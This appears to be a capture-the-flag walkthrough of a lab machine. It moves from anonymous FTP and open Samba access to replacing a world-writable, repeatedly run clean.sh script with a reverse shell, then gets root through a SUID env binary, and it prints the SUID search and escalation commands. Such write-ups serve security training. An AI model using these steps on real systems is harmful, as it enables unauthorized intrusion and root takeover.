Ok we find that port 21 is enabled as user “anonymous” let’s enter !!
Let’s go into the “scripts” directory and grab all the files inside! with the command mget * we have two file and one script.
This script appears to remove files from / tmp (temporany directory) and this script, also has execution permissions by everyone!
There are the other two files.. but we still have little information, so let’s go and enumerate samba!
We note that “pics” is readable, let’s try to log in samba without a password!
Ok we are IN! And we can extract the two pics. Now lets enumerate more. In the two photos I downloaded it was simply a rabbit hole, so let’s continue with ftp. Since we saw that the “clean.sh” file is executable on the machine, azni is doing its duty on the machine, we can inject some malicious code into it.
To do this injection, I use my faithful friend who will post you here: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet Since the script is in bash, we inject some malicious code bash.
We can also create a script, obviously with the same name, to put inside, so as to have it run automatically by the script itself.
Ok once this is done re-enter ftp, cd scripts, and finally put clean.sh, it must have the same name, because that script is running continuously. We are simply injecting the malicious code. Listen on the given door of course.
ANDDDDDDDDD we are IN!!!!!!
First flag!! Let’s go.
Exploiting SUID binary. Command: find / -perm -u=s 2>/dev/null
#Horizontal Privilege Escalation:
/usr/bin/env seems to be exploitable for info visit: https://gtfobins.github.io/
Command: /usr/bin/env /bin/sh -p
Anddddd WE ARE ROOT!! I hope I have been useful to you. Good luck guys.